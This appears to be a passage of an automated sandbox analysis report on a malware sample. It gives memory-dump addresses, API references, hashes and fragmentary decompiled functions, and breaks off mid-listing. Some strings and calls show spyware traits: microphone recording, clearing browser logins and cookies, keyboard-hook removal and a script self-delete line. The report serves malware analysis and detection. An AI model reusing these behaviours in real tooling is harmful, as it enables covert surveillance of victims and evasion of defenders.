0x105ce57c
0x00000000
0x105ce53f
0x105ce53f
0x105ce541
0x105ce54a
0x105ce54d
0x105ce552
0x105ce555
0x105ce55a
0x105ce584
0x105ce587
0x105ce589
0x105ce58c
0x105ce594
0x105ce59a
0x105ce5a1
0x105ce5a3
0x105ce5ab
0x105ce5ba
0x105ce5be
0x105ce5c0
0x105ce5c3
0x00000000
0x00000000
0x105ce5c5
0x105ce5c8
0x105ce5ca
0x105ce5ca
0x105ce5cb
0x105ce5cd
0x105ce5d0
0x00000000
0x105ce5ca
0x00000000
0x105ce55a
0x105ce53d
0x00000000

APIs

_free.LIBCMT ref: 105CE54D
_free.LIBCMT ref: 105CE56D

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction ID: 37b720f5fa566b04eb8b91d50ddec810e25e564474e346c9e4a195dad27afc22
Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction Fuzzy Hash: 0341F536A002049FCB10CFB8C984A5EBBB9EF88714F124569E905EB341E731FD01DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0043D66D, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D6DF
_free.LIBCMT ref: 0043D6FF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction ID: f44f3642cdb3200b4d66470b3fc96812a0cc5a4b7e600cbe4d0621a0c6eb3eb9
Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction Fuzzy Hash: 9A41D136E00200DBDB20DF78D881A5EB3B5EF89714F1545AEE615EB351EB35AD01CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004493AC, Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
__alloca_probe_16.LIBCMT ref: 00449431
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
__freea.LIBCMT ref: 0044949D

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
Opcode Fuzzy Hash: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A523, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040A538
Sleep.KERNEL32(00001388), ref: 0040A5C0

Strings

[Info], xrefs: 0040A61B
[Cleared browsers logins and cookies.], xrefs: 0040A5FB
Cleared browsers logins and cookies., xrefs: 0040A60C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
Instruction ID: 6d279061f464f32cb3b26c385cb9bb5b4933cac79da48b767b21b0c9aa47c76d
Opcode Fuzzy Hash: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
Instruction Fuzzy Hash: 8B31B0002483817ECA1167B518267EB6B921E53348F09447FF8D42B3D3DABA482C93AF

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCD, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BDD
waveInOpen.WINMM(0046BAB0,000000FF,0046BA98,Function_00001CEF,00000000,00000000,00000024), ref: 00401C73
waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401CC7
waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401CD6
waveInStart.WINMM ref: 00401CE2

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
Instruction ID: 2b1c6c3e797ec0a8f4e77f87a8aae8cb50084cbbd1b388b0679906e1f0d720f4
Opcode Fuzzy Hash: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
Instruction Fuzzy Hash: 4F218E316143019BC714AFE6EC4592A7BA5EB44315700403FF505D6AB1FBB844809B9E

Uniqueness

Uniqueness Score: -1.00%

Function 105A87B5, Relevance: 7.6, APIs: 5, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E105A87B5(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}

0x105a87b8
0x105a87b9
0x105a87bf
0x105a87c1
0x105a87c5
0x105a87c7
0x105a87c9
0x105a87e1
0x105a87e6
0x105a87cb
0x105a87ce
0x105a87d7
0x105a87da
0x105a87d0
0x105a87d2
0x105a87d3
0x105a87d3
0x105a87ce
0x105a87fa
0x105a87ff
0x105a8809
0x105a8836
0x105a8838
0x105a8838
0x105a883b
0x105a8841
0x00000000
0x105a881b
0x105a881c
0x00000000
0x105a881c
0x105a8801
0x105a8801
0x105a8801
0x105a8843
0x105a8849
0x105a8849

APIs

CreateFileW.KERNEL32(10596BD7,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,105A88DF,00000000,00000000), ref: 105A87F4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A8810
CloseHandle.KERNEL32(00000000,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A881C
WriteFile.KERNEL32(00000000,00000000,00000000,10596BD7,00000000,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A882E
CloseHandle.KERNEL32(00000000,?,105A88DF,00000000,00000000,00000000,00000004), ref: 105A883B

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction ID: 043118d7dbb1f0232ee8d554044268d68aeb2412bb882560c6f38feefbb4c383
Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction Fuzzy Hash: 5A11CE71200119FFEB044F649C89EBF7BACEB063B6F208665FA14D6180DA75CE00DA74

Uniqueness

Uniqueness Score: -1.00%

Function 00417947, Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction ID: 60abe95f3f53f8d2d0590be13cf87a5088bcec8eb26bc593558798ef6058d585
Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction Fuzzy Hash: 8F11E0B1214118BFFB104F649C89EFB777CEB063B2F104266F915D6280C6749E888A68

Uniqueness

Uniqueness Score: -1.00%

Function 004475DA, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004475E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
_free.LIBCMT ref: 0044763F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ff0ef2b5bd68759a5bb2af28ad7db221fac1a14d15d758b7e8a29f0401de12d4
Instruction ID: f196bec27739b8aa23800adfafa3dc4af21a9600f240203cb0157e91f0545353
Opcode Fuzzy Hash: ff0ef2b5bd68759a5bb2af28ad7db221fac1a14d15d758b7e8a29f0401de12d4
Instruction Fuzzy Hash: D701B1B2605B117B77211ABA5C88C7B6A6EDAC6BB6716012AB904C3241DF698D0381BC

Uniqueness

Uniqueness Score: -1.00%

Function 105D2BD4, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E105D2BD4(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46a1e0;
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E105D01B6(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E105D314D(_t13, _t16, __eflags,  *0x46a1e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E105D29C2(_t13, _t15, 0x46b654);
							E105D1063(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E105D1063();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E105D30F7(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x105d2bd4
0x105d2bdf
0x105d2be1
0x105d2be3
0x105d2be8
0x105d2beb
0x105d2bf9
0x105d2c05
0x105d2c08
0x105d2c0b
0x105d2c1d
0x105d2c22
0x105d2c24
0x105d2c2f
0x105d2c35
0x105d2c3d
0x105d2c3f
0x00000000
0x00000000
0x00000000
0x00000000
0x105d2c26
0x105d2c26
0x00000000
0x105d2c26
0x105d2c0d
0x105d2c0d
0x105d2c0e
0x105d2c0e
0x105d2c41
0x105d2c42
0x105d2c42
0x105d2bed
0x105d2bf3
0x105d2bf7
0x105d2c4a
0x105d2c4b
0x105d2c51
0x00000000
0x00000000
0x00000000
0x105d2bf7
0x105d2c58

APIs

GetLastError.KERNEL32(?,?,?,105CB377,105D083D,?,?,105C00B2,?,?,10592504,?,?,?,?,?), ref: 105D2BD9
_free.LIBCMT ref: 105D2C0E
_free.LIBCMT ref: 105D2C35
SetLastError.KERNEL32(00000000), ref: 105D2C42
SetLastError.KERNEL32(00000000), ref: 105D2C4B

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7ee369afd479ac2837c5f3bf368578fc49785976bc25547c1a3d24fbc6c937a0
Instruction ID: 9c06a477d8f376d8088a65f3029cd0e412ea451d992209cdb9e61b601d238916
Opcode Fuzzy Hash: 7ee369afd479ac2837c5f3bf368578fc49785976bc25547c1a3d24fbc6c937a0
Instruction Fuzzy Hash: 2F01D63A155B4277D202562D5D89D0F3E2DEBE19F27210027F415A23A1EF60DD025366

Uniqueness

Uniqueness Score: -1.00%

Function 00441D66, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00441D6B
_free.LIBCMT ref: 00441DA0
_free.LIBCMT ref: 00441DC7
SetLastError.KERNEL32(00000000), ref: 00441DD4
SetLastError.KERNEL32(00000000), ref: 00441DDD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 5e542beba79a8bf6764b15491aefcaaf73a6759a21e196224635428f5f1622e9
Instruction ID: 518b8b7a10e8b52fdd41fbed7a824b68d6ac3c55cbd30764ca1a8d4e20b8b852
Opcode Fuzzy Hash: 5e542beba79a8bf6764b15491aefcaaf73a6759a21e196224635428f5f1622e9
Instruction Fuzzy Hash: 4601D6F6941B016BB20267669C45D5B1629AFC17B6B20013FF905A22A2FEACD952412E

Uniqueness

Uniqueness Score: -1.00%

Function 105D9AAA, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E105D9AAA(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;

				_t21 = _a4;
				if(_t21 != 0) {
					_t7 =  *_t21;
					if( *_t21 !=  *0x46a188) {
						E105D1063(_t7);
					}
					_t8 =  *((intOrPtr*)(_t21 + 4));
					if( *((intOrPtr*)(_t21 + 4)) !=  *0x46a18c) {
						E105D1063(_t8);
					}
					_t9 =  *((intOrPtr*)(_t21 + 8));
					if( *((intOrPtr*)(_t21 + 8)) !=  *0x46a190) {
						E105D1063(_t9);
					}
					_t10 =  *((intOrPtr*)(_t21 + 0x30));
					if( *((intOrPtr*)(_t21 + 0x30)) !=  *0x46a1b8) {
						E105D1063(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					if(_t6 !=  *0x46a1bc) {
						return E105D1063(_t6);
					}
				}
				return _t6;
			}

0x105d9ab0
0x105d9ab5
0x105d9ab7
0x105d9abf
0x105d9ac2
0x105d9ac7
0x105d9ac8
0x105d9ad1
0x105d9ad4
0x105d9ad9
0x105d9ada
0x105d9ae3
0x105d9ae6
0x105d9aeb
0x105d9aec
0x105d9af5
0x105d9af8
0x105d9afd
0x105d9afe
0x105d9b07
0x00000000
0x105d9b0f
0x105d9b07
0x105d9b12

APIs

_free.LIBCMT ref: 105D9AC2

Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B

_free.LIBCMT ref: 105D9AD4
_free.LIBCMT ref: 105D9AE6
_free.LIBCMT ref: 105D9AF8
_free.LIBCMT ref: 105D9B0A

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
Instruction ID: c001108473c20bb9398e509e48d737942de6a702c06e02b4958346f5951424ae
Opcode Fuzzy Hash: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
Instruction Fuzzy Hash: 08F0FF325047406B8650EB5DE8C9C567BEEEA41B50764481BF058EB740DA70FC908BDA

Uniqueness

Uniqueness Score: -1.00%

Function 1059ABE1, Relevance: 7.5, APIs: 5, Instructions: 40
threadfileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1059ABE1() {
				signed int _t15;

				 *0x46c399 = 0;
				TerminateThread(0x40884b, 0);
				if( *0x46c350 != 0) {
					__eax = UnhookWindowsHookEx(__eax);
					 *0x46c350 = 0;
					__eax = TerminateThread(0x408830, 0);
				}
				_pop(0);
				_push(0);
				_t25 = DeleteFileW(E10592D59(0x46c3b0));
				_t15 = 0 | DeleteFileW(E10592D59(0x46c3b0)) != 0x00000000;
				if(E10598352(_t25) != 0) {
					RemoveDirectoryW(E10592D59(0x46c3c8));
				}
				return _t15;
			}

0x1059abea
0x1059abf0
0x1059abfd
0x1059ac00
0x1059ac0c
0x1059ac12
0x1059ac12
0x1059ac1d
0x1059aba4
0x1059abb7
0x1059abc1
0x1059abcb
0x1059abd6
0x1059abd6
0x1059abe0

APIs

DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
TerminateThread.KERNEL32(00408830,00000000,?,1059BC11), ref: 1059AC12

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: TerminateThread$DeleteDirectoryFileHookRemoveUnhookWindows
String ID:
API String ID: 1060769190-0
Opcode ID: efb332bf48883709781a4720a809b868e21492ccd9fd84fc17aea0fa76bf2a2b
Instruction ID: a563ffc4adb00689aa36758b58d05a1214463fd5b90d2dfe4927b121e06babe7
Opcode Fuzzy Hash: efb332bf48883709781a4720a809b868e21492ccd9fd84fc17aea0fa76bf2a2b
Instruction Fuzzy Hash: F6F0C2762007409FD7009F709C889B77B9DEA04287344847EF88393261DB78DD49C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00448C3C, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448C54

Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 00448C66
_free.LIBCMT ref: 00448C78
_free.LIBCMT ref: 00448C8A
_free.LIBCMT ref: 00448C9C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
Instruction ID: abb083eb189c983c5d77c8f64225a59d0eec0651e2c7371879094191d40c33d5
Opcode Fuzzy Hash: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
Instruction Fuzzy Hash: 75F06232505610EBE720FB6AE9C5C4B73E9AB41710754081FF249E7600CF39FC908A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0043D8BC, Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D8DA

Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 0043D8EC
_free.LIBCMT ref: 0043D8FF
_free.LIBCMT ref: 0043D910
_free.LIBCMT ref: 0043D921

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
Instruction ID: 5add5f9177ea0066f46c3e8b3c16d1701801f70c1477332ad76d85b4da6d78c6
Opcode Fuzzy Hash: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
Instruction Fuzzy Hash: 08F0FEB1842A209BD7117F95BC424053B60E704728711053BF611E6771FBBA08A1DFDF

Uniqueness

Uniqueness Score: -1.00%

Function 105ACB87, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E105ACB87(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				intOrPtr* _t79;
				void* _t81;
				intOrPtr _t82;
				intOrPtr* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = E1059C927();
				_t85 = 0x45f57c;
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = E105CA37E(0x45f57c, 0x465d68, 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = E105CA37E(0x45f57c, 0x465d6c, 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E105C264E(_t85, 0x4657f0);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E105CCB3E( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x460830;
								while(1) {
									_t15 = _t93 - 4; // 0x465d50
									_t59 = E105CA37E( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = E105CA37E( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x460834));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x460835));
								_t62 =  *((intOrPtr*)(_t76 + 0x460834));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E105C264E( &_v80, 0x465d74);
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x460835));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 = _t92 + 1;
							do {
								_t68 =  *_t92;
								_t92 = _t92 + 1;
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 = _t79 + 1;
					do {
						_t69 =  *_t79;
						_t79 = _t79 + 1;
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					E105AA1A1(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}

0x105acb90
0x105acb93
0x105acb99
0x105acb9d
0x105acba0
0x105acba8
0x105acbab
0x105acbb2
0x105acd52
0x00000000
0x105acd52
0x105acbc0
0x105acbc5
0x105acbca
0x105acd4d
0x00000000
0x105acd4f
0x105acbd8
0x105acbdd
0x105acbe2
0x00000000
0x00000000
0x00000000
0x00000000
0x105acbe8
0x105acbe8
0x105acbee
0x105acbf5
0x105acbfb
0x105acc0f
0x105acc11
0x105acc14
0x105acc1d
0x105acc31
0x105acc33
0x105acc39
0x105acc3e
0x105acc41
0x105acc47
0x105acc4a
0x105acc4c
0x105acc54
0x105acc8d
0x105acc8d
0x105acc90
0x00000000
0x105acc90
0x105acc56
0x105acc5b
0x105acc5d
0x105acc64
0x105acc69
0x105acc6e
0x00000000
0x00000000
0x105acc78
0x105acc7d
0x105acc82
0x00000000
0x00000000
0x105acc84
0x105acc85
0x105acc8b
0x00000000
0x00000000
0x00000000
0x105acc8b
0x105acccb
0x105accd4
0x00000000
0x00000000
0x105accd6
0x105accd9
0x105acce2
0x105accec
0x105accf3
0x105accf9
0x105accfe
0x105acd3b
0x105acd3b
0x105acd42
0x105acd44
0x105acd45
0x00000000
0x105acd45
0x105acd02
0x105acd12
0x105acd16
0x105acd2c
0x105acd30
0x105acd32
0x105acd32
0x00000000
